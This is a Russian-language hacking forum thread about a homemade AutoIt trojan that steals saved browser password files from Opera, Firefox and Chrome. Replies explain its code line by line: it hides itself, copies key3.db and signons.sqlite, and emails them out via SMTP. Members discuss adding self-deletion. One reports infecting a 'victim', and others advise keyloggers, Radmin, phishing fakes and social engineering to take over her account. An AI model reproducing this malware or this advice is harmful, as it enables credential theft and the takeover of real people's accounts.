Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.



Троян password!!!

Сообщений 1 страница 30 из 122

1

Доброго времени суток!!!

Этот трой который ворует файлы с паролями от браузеров как Opera , Mozilla Firefox и Google Chrome !!!

Я написал этот трой на языке AutoIt так что топаем в википедию и

Читаем|Закрываем

AutoIt — свободно распространяемый язык для автоматизации выполнения задач в Microsoft Windows. В ранних версиях программа преимущественно использовалась для создания скриптов автоматизации (иногда называемых макросами) для программ Microsoft Windows. Такие скрипты полезны для выполнения часто повторяющихся задач, таких как инсталляция идентичных наборов программ на большое количество компьютеров. В более поздних версиях AutoIt улучшился дизайн языка и возросла общая функциональность, что приблизило AutoIt к языкам общего назначения.

С выходом AutoIt 3 синтаксис языка был реструктурирован и приблизился к семейству BASIC. Скрипт может быть скомпилирован в независимый от установленного в системе интерпретатора исполняемый файл.

Скажу что не надо создавать никаких самораспаков и добавлять программу Blat для отсылки логов! все делается одним кликом так сказать!!! Вам для этого нужно скачать пакет Autoit-v3 и установить на вашей тачке для того чтоб смогли скапилировать в exe!!! ниже я объясню как это делается!

И так сам исходник!!!

Где вводить логин и пасс я отметил красным! если кого то интересует более подробное описание исходника то могу расписать!

И так устанавливаем Autoit-v3 и у нас в проводнике в пункте создать появится строка  Autoit-v3 Script

http://uploads.ru/t/q/K/j/qKjhR.jpg

Кликаем на него и создаем файл и открываем его (правый клик Edit Script) и вставляем туда наш исходник и вписываем логин и пасс от мыло и закрываем!!! Потом так же держим на него и правый клик "Compile Script"!!!

Все наш трой готов! (367kb)

После запуска он сам на себя ставит приоритеты то есть грубо говоря исчезает! 

Трой будет полезным для тех кто ленится делать самараспаки или вообще не может их делать!

Пока что все

+2

2

Доброго времени суток!

Спасибо, Lyubitel за пост.

Вот только пару вопросов есть к тебе.

1. Скомпилировал все как надо, пришли письма на ящик signons.sqlite, key3.db: Вопрос в следующем чем открыть их? Пробывал открывать в блокноте, показывает только дату отправки письма. Пассов нет.
2.

если кого то интересует более подробное описание исходника то могу расписать!

Если не сложно, хотелось бы разобраться.

Сори если глупые вопросы. Только познаю еще )

Спасибо!

0

3

INtello
замени их на свой

0

4

INtello замени эти файлы на свои и будет тебе счастье,в смысле прочитать их сможешь уже в браузере,(через показать сохранённые пароли) если я не ошибаюсь то в этом видео( Самый простой Batch вирус ворующий файлы с паролями. ) это продемонстрировано.Распишет автор,хотя там и расписывать не чего))
Скачай справочник и полистай функции которые употребляются в скрипте,так тебе станет более понятней как это работает,да и в дальнейшем всё придётся столкнуться с справочником.

в кратце всё же:

FileSetAttrib ( @ScriptName, "+SRAH") - скрипт ставит сам на себя скрытые атрибуты(хз зачем всё и сразу,можно обойтись и двумя значениями AH )
DirCreate(@ScriptDir & "\winsc" ) - создаёт возле себя папку winsc в которую в принципе в дальнейшем и будет копировать всё файлы перед отправкой.
FileSetAttrib ( @ScriptDir & "\winsc" , "+SRAH") - ставит атрибуты на созданную папку
Sleep(1000) -  пауза перед последующим выполнением скрипта,ток хз зачем здесь и на столько))
    _RunDOS ( "copy /y %AppData%\Mozilla\Firefox\Profiles\*.default\key3.db \winsc" )   _RunDOS - это команда для выполнения команд встроенной Windows'oi командной строки(CMD),copy - это команда КМД копировать,подробней о ней можешь узнать в своей командной строке или же здесь.
    Sleep(1000) - опять пауза
    $AttachFiles = @ScriptDir & "\winsc\key3.db" - приатачивания скопированного файла к телу письма
    $FromName = "Mozilla (key3.db)" - задаёт имя письма(типа от кого: Вася Пупкин)
      _FileWriteLog($AttachFiles,$sFile) - пишет в лог(опять зачем хз))
_INetSmtpMailCom($SmtpServer,$FromName,$FromAddress,$ToAddress,$Subject,$sText,$AttachFiles,$CcAddress,$BccAddress,$Importance,$Username,$Password,$IPPort,$ssl) - отправляет письмо,через функцию отсылки (Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $s_AttachFiles = "", $s_CcAddress = "", $s_BccAddress = "", $s_Importance="Normal", )
    Sleep(1000)

Ну и дальше в том же духе,до Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $s_AttachFiles = "", $s_CcAddress = "", $s_BccAddress = "", $s_Importance="Normal",  - это начало функции отправки на мыло письма.
Дальше я так думаю пусть распишет сам автор.

0

5

MOssWar написал(а):

Sleep(1000) -  пауза перед последующим выполнением скрипта,ток хз зачем здесь и на столько))

Я тока присмотрелся там я забыл удалить много sleep)))))

MOssWar написал(а):

хз зачем всё и сразу,можно обойтись и двумя значениями AH

Кое кто мне сам говорил что лучше все сразу)))))))

MOssWar написал(а):

_FileWriteLog($AttachFiles,$sFile) - пишет в лог(опять зачем хз))

без этого сцука не отправит файл))))

INtello Я немного расписал возьми справочник так будет тебе понятнее :rolleyes:

0

6

Lyubitel может модифицируем его?

0

7

MOssWar написал(а):

Lyubitel может модифицируем его?

Я за)) какие предложение?))

0

8

Lyubitel да хз,честно говоря))
ну первое что надо сделать,эт припаять самоудаление,второе наверное вообще писать через поиск.
Хз честно говоря сейчас не очень как то в голову идеи прут,после подумаю.

0

9

почему пороли от мозиллы не приходят сколько раз отправлял не разу не пришло даже себе отправил всеравно пусто? от оперы приходят норм все от гугл хрома приходят только почему то их нельзя простмотреть только показывает логины а пассов нету

0

10

Almaz88 хз че за у тя трабла.. вечером немного на радминах тестану! но у меня работает! ну если мпр говорит что нет пассов значит нет или не может расшифровать)

0

11

Lyubitel скорей всего MPR не тянет,тупа сдулся))
Нужно уже дуриге проги юзать и соответственно переписывать вирусы.
Ну эт вирус ещё актуален,правда не для всех версий браузеров,да и мозила вроде обновилась,вместе с обновлениями и изменения.
Надо будет писать вирь на перехват запросов.

+1

12

MOssWar моя мозила тоже обновилось но все пашет)) мля честно я некогда его не использовал для кражи паролей мне это не надо)))) я добрый https://forumupload.ru/uploads/000f/db/02/1718-1.gif
вот только что тестанул все пашет!

0

13

Lyubitel честно говоря большинство тех вирусов которые я сделал или написал,тоже сцук сам толкам и не юзал)))
Так чисто проверил на работоспособность и отправил по пункут назначению))
Не ну была тема когда так чисто раскидывал и то для теста,как бы сказать нужно было знать работоспособность в стате.
Правда и чужие вири не использовал,ибо своих уже наляпал,заюзаться можно))

0

14

тольео Яндекс почта??? Или не имеет значения?

0

15

zet-22 не имеет значения.. можешь например и на mail.ru и на gmail (для gmail нужно поставить порт 465)

0

16

Уменя ошибка после запуска!! что делать? https://forumupload.ru/uploads/000f/db/02/1750-2.gif

0

17

zet-22 сделай скрин или опиши какая ошибка здесь экстрасенсов нет https://forumupload.ru/uploads/000f/db/02/1708-2.gif

0

18

Вот

[mods]Что вот? https://forumupload.ru/uploads/000f/db/02/1718-4.gif   [/mods]

0

19

https://forumupload.ru/uploads/000f/db/02/1755-2.gif http://i5.pixs.ru/storage/0/1/7/rotbmp_7452954_2899017.jpg

0

20

zet-22 ну тут думаю ошибка не в скрипте.. по ходу у тя автоит криво сел... переустанови его если не поможет попробуй собрать его на вирт машине или на другом тачке..

_______________________________________________________________________________

Да и скрины нужно выложить или через форум или например pixs.ru! а не какой то zalil

0

21

Всем прив!! Помогите я всё зделал всё норм! Но вот только незнаю куда кидать файл который пришол на мыло например от оперы cookies4.dat Подскажите путь пожал!!!

0

22

%AppData%\Opera\Opera\cookies4.dat путь до файла,но в самом файле хранятся только Coocie( Wiki )
Пароли же хранятся в Wand.dat - от опера до 11* версий,если софт обнавлён то в нём не будет ни чего ровным счётом(((
Где в новой версии хранятся пасы,или как извлечь пасы с оперы 11* версий пока что ещё не разбирался,да и не гуглил даже в этом направление,так что тут только если софт не обновлён.
____________

0

23

Спосибо!! Щя буду пробывать!

0

24

Блин немогу понять!! Есит такая папка Application Data но такой %AppData% нет! А втой папке нету Оперы ток експролер !! Есть проста папка Cookies !! Раскажи всё по порядку а то я не вьеду! Сори за много вопросов! Я тока учюсь! =)

0

25

Всё!! Я всё разобрался! Спосибо всем! Класный сайт!

0

26

Помогите! Я всё зделал дал вирус жертве она запустила! Мне всё пришло я заменил файлы на свои! И когда ввожу например вконтакте оно не заходит на её страницу!! Ни через мозилу ни через оперу! Подскажите что нить плиз!

0

27

Влад Значит что она не сохраняла пароли(( попробуй развести на фейк или хер с фейком у тя вроде есть контакт с жертвой пошли ей кеилогер ну или радмина! вобшем не огорчайся тут вопрос времени + навыки СИ https://forumupload.ru/uploads/000f/db/02/1731-4.gif

0

28

Ещё вопросик! кеилогер  ето что?

0

29

Влад написал(а):

Ещё вопросик! кеилогер  ето что?

Это клавиатурный шпион! то есть перехватывает все нажатия на клавиатуре! Вот у же задавали вопрос про него Ссылка

0

30

Спосибо!!

0